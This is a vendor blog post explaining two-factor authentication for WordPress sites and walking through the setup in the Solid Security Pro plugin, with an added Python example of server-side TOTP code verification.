Even if you use a password manager like LastPass to create strong and unique passwords for each of your accounts, you still need to consider other administrator and editor users on your site. If an attacker was able to compromise one of their accounts, they could still do damage to your website.
Fortunately, there is a method to secure your WordPress user accounts: two-factor authentication.
Two-factor authentication is a process of verifying a person’s identity by requiring two separate methods of verification. Google shared on its blog that using two-factor authentication can stop 100% of automated bot attacks.
Two-factor authentication uses different categories of identity verification:
1. Something You Know. Do you remember filling out security questions when setting up your online mortgage account? Something like “Who is your favorite teacher?” or “What is your mother’s maiden name?” These security questions are a form of two-factor authentication because they require answers only you would know.
2. Something You Have. This category requires you to have something physically in your possession, like your phone or a YubiKey, to prove your identity. For example, some two-factor authentication methods require a time-based code sent to a specific device via a 2FA app.
3. Something You Are. You may not know the name, but if you have a smartphone, you have probably used biometric authentication to log into your phone. Biometric authentication requires a unique biological characteristic to authenticate your login. If your phone has a fingerprint scanner or Face ID, you are using biometric authentication every time you unlock your phone.
Requiring another method of identity verification to log into your website would block all automated brute force attacks and help protect you if there is a Broken Authentication vulnerability on your website. A Broken Authentication vulnerability can allow an attacker to compromise a user’s passwords, keys, or session tokens and take over that user’s accounts.
To get started with Two-Factor Authentication, navigate to the security settings’ Features menu and enable the Two-Factor feature.
Now, let’s take a closer look at the Two-Factor settings.
Authentication Methods Available to Users – The settings let you choose which of the three authentication methods you will allow people to use.
The three authentication methods provided by Solid Security Pro:
Alright, let’s move on to the rest of the two-factor settings.
We created the two-factor onboarding to create a user-friendly way for people to set up two-factor on their accounts when they log in. After you enable two-factor authentication, every user will be guided through the onboarding process. You can disable two-factor onboarding for specific user groups in the two-factor settings.
Alright, let’s walk through the logging-in and the two-factor onboarding process step by step.
Just like normal, the first thing you will see is the login form. Enter your credentials and click the Log In button.
If you follow our recommendations and enable the force 2FA requirement for privileged users, the next thing you will see is a place to enter the two-factor token sent to your email address. Open the email, copy and paste the token, and then click the Log In button.
On the next screen, you will be presented with the onboarding welcome text. Keep in mind that you can customize this in your two-factor settings. Click the Continue button to move on to the next step.
The next step is to select which two-factor methods you want to enable for your account. Click on the Backup Codes arrow to generate a list of backup codes to use if your primary method of authentication fails.
Now click the Download button to download a text file of your backup codes. Be sure to store these codes somewhere safe.
Now click the Back link to return to the previous screen. Next, click on the Mobile App arrow to enable and configure this method of authentication for our user.
Now, choose your mobile OS and then open your mobile two-factor app on your phone.
From your phone, scan the QR code to continue to link the secret to your mobile app.
Now enter the 6-digit code from your phone into your web browser and click Verify to finish the mobile app setup.
Alright, now that you have two-factor all set up, click the Continue button to finish logging into your WordPress dashboard.
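To show what happens behind the Mobile App method described above (the “Something You Have” category and the QR code/6-digit code steps), here is an added example of server-side TOTP (RFC 6238) verification with a clock-skew window and replay protection. It is not Solid Security Pro’s own code; the secret, account name and timestamps are constructed for illustration.

```python
"""TOTP verification for the mobile-app second factor (added example,
not the plugin's code). The secret, account and issuer are constructed."""
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional
from urllib.parse import quote

STEP = 30     # seconds per time step used by standard authenticator apps
DIGITS = 6    # length of the code the phone shows
WINDOW = 1    # accept one step either side to absorb phone/server clock drift

# Constructed secret (RFC 6238 test key "12345678901234567890" in base32).
SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"

def provisioning_uri(secret_b32: str, account: str, issuer: str) -> str:
    """otpauth:// URI that is rendered as the QR code the user scans."""
    label = quote(f"{issuer}:{account}")
    return (f"otpauth://totp/{label}?secret={secret_b32}&issuer={quote(issuer)}"
            f"&algorithm=SHA1&digits={DIGITS}&period={STEP}")

def totp(secret_b32: str, counter: int) -> str:
    """HOTP value (RFC 4226) for one time-step counter, zero-padded."""
    key = base64.b32decode(secret_b32, casefold=True)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** DIGITS).zfill(DIGITS)

def verify(secret_b32: str, code: str, now: int,
           last_used: Optional[int] = None) -> Optional[int]:
    """Return the matching step counter, or None if the code is rejected.
    last_used is the counter of the last accepted code; anything at or
    before it is refused so an intercepted code cannot be replayed."""
    if len(code) != DIGITS or not code.isdigit():
        return None
    current = now // STEP
    for counter in range(current - WINDOW, current + WINDOW + 1):
        if last_used is not None and counter <= last_used:
            continue
        # constant-time compare so timing does not leak partial matches
        if hmac.compare_digest(totp(secret_b32, counter), code):
            return counter
    return None

if __name__ == "__main__":
    print(provisioning_uri(SECRET, "alice@example.com", "Example Site"))
    print("current code:", totp(SECRET, int(time.time()) // STEP))
```

After a successful verify, store the returned counter as the user’s `last_used` so the same code is never accepted twice.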
To sum up, there is nothing as easy and secure as adding two-factor authentication to your WordPress login. If you aren’t currently using two-factor, add it to your website now and start protecting yourself against automated attacks.
The post Solid Security Pro Feature Spotlight – Two-Factor Authentication appeared first on SolidWP.